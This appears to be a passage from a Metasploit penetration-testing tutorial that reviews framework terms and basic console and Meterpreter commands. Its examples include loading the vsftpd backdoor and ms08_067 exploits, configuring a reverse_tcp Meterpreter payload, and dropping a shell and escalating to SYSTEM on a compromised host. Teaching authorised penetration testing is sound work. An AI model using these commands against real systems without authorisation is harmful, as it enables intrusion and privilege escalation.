Conducting a penetration test with Metasploit
After setting up Kali Linux, we are now ready to perform our first penetration test with Metasploit. However, before we start the test, let us recall some of the basic functions and terminologies used in the Metasploit framework.
Recalling the basics of Metasploit
After we run Metasploit, we can list all the workable commands available in the framework by typing help in Metasploit console. Let us recall the basic terms used in Metasploit, which are as follows:
- Exploits: This is a piece of code that, when executed, will exploit the vulnerability on the target.
- Payload: This is a piece of code that runs at the target after a successful exploitation is done. It defines the actions we want to perform on the target system.
- Auxiliary: These are modules that provide additional functionalities such as scanning, fuzzing, sniffing, and much more.
- Encoders: Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall.
- Meterpreter: Meterpreter is a payload that uses in-memory DLL injection stagers. It provides a variety of functions to perform at the target, which makes it a popular payload choice.
Let us now recall some of the basic commands of Metasploit that we will use in this chapter. Let us see what they are supposed to do:
|
Command |
Usage |
Example |
|
|
To select a particular module to start working with |
msf>use exploit/unix/ftp/vsftpd_234_backdoor
msf>use auxiliary/scanner/portscan/tcp
|
|
|
To see the list of available modules of a particular type |
msf>show payloads
msf> show options
|
|
|
To set a value to a particular object |
msf>set payload windows/meterpreter/reverse_tcp
msf>set LHOST 192.168.10.118
msf> set RHOST 192.168.10.112
msf> set LPORT 4444
msf> set RPORT 8080
|
|
|
To set a value to a particular object globally so the values do not change when a module is switched on |
msf>setg RHOST 192.168.10.112
|
|
|
To launch an auxiliary module after all the required options are set |
msf>run
|
|
|
To launch an exploit |
msf>exploit
|
|
|
To unselect a module and move back |
msf(ms08_067_netapi)>back
msf>
|
|
|
To list the information related to a particular exploit/module/auxiliary |
msf>info exploit/windows/smb/ms08_067_netapi
msf(ms08_067_netapi)>info
|
|
|
To find a particular module |
msf>search hfs
|
|
|
To check whether a particular target is vulnerable to the exploit or not |
msf>check
|
|
|
To list the available sessions |
msf>sessions [session number]
|
Following are the meterpreter commands:
|
Meterpreter Commands |
Usage |
Example |
|
|
To list system information of the compromised host |
meterpreter>sysinfo
|
|
|
To list the network interfaces on the compromised host |
meterpreter>ifconfig
meterpreter>ipconfig (Windows)
|
|
|
List of IP and MAC addresses of hosts connected to the target |
meterpreter>arp
|
|
|
To send an active session to background |
meterpreter>background
|
|
|
To drop a cmd shell on the target |
meterpreter>shell
|
|
|
To get the current user details |
meterpreter>getuid
|
|
|
To escalate privileges and gain SYSTEM access |
meterpreter>getsystem
|
|
|
To gain the process ID of the meterpreter access |
meterpreter>getpid
|
|
|
To list all the processes running on the target |
meterpreter>ps
|
Note
If you are using Metasploit for the very first time, refer to http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commands for more information on basic commands.
